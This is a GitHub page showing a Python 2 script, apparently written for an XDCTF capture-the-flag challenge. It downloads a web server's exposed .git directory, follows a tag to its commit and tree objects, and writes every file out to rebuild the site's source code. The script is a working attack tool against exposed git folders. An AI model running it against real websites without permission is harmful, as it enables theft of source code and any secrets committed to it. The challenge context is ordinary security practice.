-
Notifications
You must be signed in to change notification settings - Fork 37
Expand file tree
/
Copy pathgitcommit.py
More file actions
executable file
·119 lines (104 loc) · 3.38 KB
/
gitcommit.py
File metadata and controls
executable file
·119 lines (104 loc) · 3.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import sys
import requests
import os
import zlib
import re
import Queue
import binascii
headers = {
"User-Agent": "Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MB526 "
"Build/4.5.1-134_DFP-1321) AppleWebKit/533.1 (KHTML, like Gecko)"
" Version/4.0 Mobile MQQBrowser/4.0 Safari/533.1"
}
target = "http://xdsec-cms-12023458.xdctf.win/.git/"
output_folder = "./xdsec_cms/"
class GitDdatabase(object):
def __init__(self, data):
self.data = data
self.pos = 0
def read_to_next_char(self, char=" "):
pos = self.data.index(char, self.pos)
ret = self.read_exact(pos)
self.pos += 1
return ret
def read_exact(self, size):
ret = self.data[self.pos:size]
self.pos = size
return ret
def read_blob(self):
return re.sub('^blob \d+?\00', '', self.data)
def read_tree(self):
mode = self.read_to_next_char(" ")
filename = self.read_to_next_char("\x00")
sha1 = self.read_exact(self.pos + 20)
return mode, filename, sha1
def get_db_type(self):
file_sort = self.read_to_next_char(" ")
file_size = self.read_to_next_char("\x00")
file_size = int(file_size)
return file_sort, file_size
def request_object(id):
global target
folder = 'objects/%s/' % id[:2]
response = requests.get(target + folder + id[2:])
if response.status_code == 200:
return zlib.decompress(response.content)
else:
return False
if __name__ == "__main__":
response = requests.get(target + "refs/tags/1.0", headers=headers)
if response.status_code == 404:
print("No this tag")
sys.exit(0)
data = response.content
commit_id = data.strip()
next_id = commit_id
data = request_object(next_id)
if not data:
print("No this commit id")
sys.exit(0)
rex = re.search(ur"commit .*?([a-f0-9]{40})", data)
next_id = rex.group(1)
data = request_object(next_id)
if not data:
print("No this commit id")
sys.exit(0)
tasks = Queue.Queue()
gd = GitDdatabase(data)
file_sort, file_size = gd.get_db_type()
while 1:
try:
(mode, filename, sha1) = gd.read_tree()
basedir = "./"
tasks.put((mode, filename, sha1, basedir))
except ValueError as e:
break
while 1:
if tasks.empty():
break
(mode, filename, sha1, basedir) = tasks.get()
sha1 = binascii.b2a_hex(sha1)
data = request_object(sha1)
if not data:
continue
gd = GitDdatabase(data)
file_sort, file_size = gd.get_db_type()
if file_sort == "tree":
basedir = os.path.join(basedir, filename)
while 1:
try:
(mode, filename, sha1) = gd.read_tree()
tasks.put((mode, filename, sha1, basedir))
except ValueError as e:
break
elif file_sort == "blob":
data = gd.read_blob()
folder = os.path.join(output_folder, basedir)
if not os.path.exists(folder):
os.makedirs(folder)
filename = os.path.join(folder, filename)
with open(filename, "wb") as f:
f.write(data)
print("[+] Write {filename} success".format(filename=filename))